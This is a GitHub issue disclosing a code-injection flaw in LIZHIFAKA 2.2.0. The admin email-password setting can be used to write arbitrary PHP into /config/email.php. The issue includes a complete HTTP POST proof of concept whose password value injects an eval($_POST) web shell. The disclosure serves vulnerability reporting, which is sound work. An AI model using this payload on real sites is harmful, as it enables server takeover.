Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

An issue was discovered in LIZHIFAKA 2.2.0 #22

Open
zi0n8 opened this issue May 30, 2021 · 0 comments
Open

An issue was discovered in LIZHIFAKA 2.2.0 #22

zi0n8 opened this issue May 30, 2021 · 0 comments

Comments

@zi0n8
Copy link

zi0n8 commented May 30, 2021

Sorry for my bad english

English:
/admin/index/email (Requires admin rights) The setting password option in this location can write arbitrary content to /config/email.php to obtain website permissions
Chinese:
/admin/index/email (需要管理员权限) 后台修改email密码处可以getshell获取网站权限

POC:
POST /admin/api/config/editEmail HTTP/1.1
Host: www.lizhi.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://www.lizhi.top
Connection: close
Referer: http://www.lizhi.top/admin/index/email
Cookie: PHPSESSID=jedhau3007vnla9hjdv228ugdi

smtp=smtp.163.com&port=994&user=admin&pass=admin','test'=>"${@eval($_POST['a'])};",'a'=>'

1
2

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant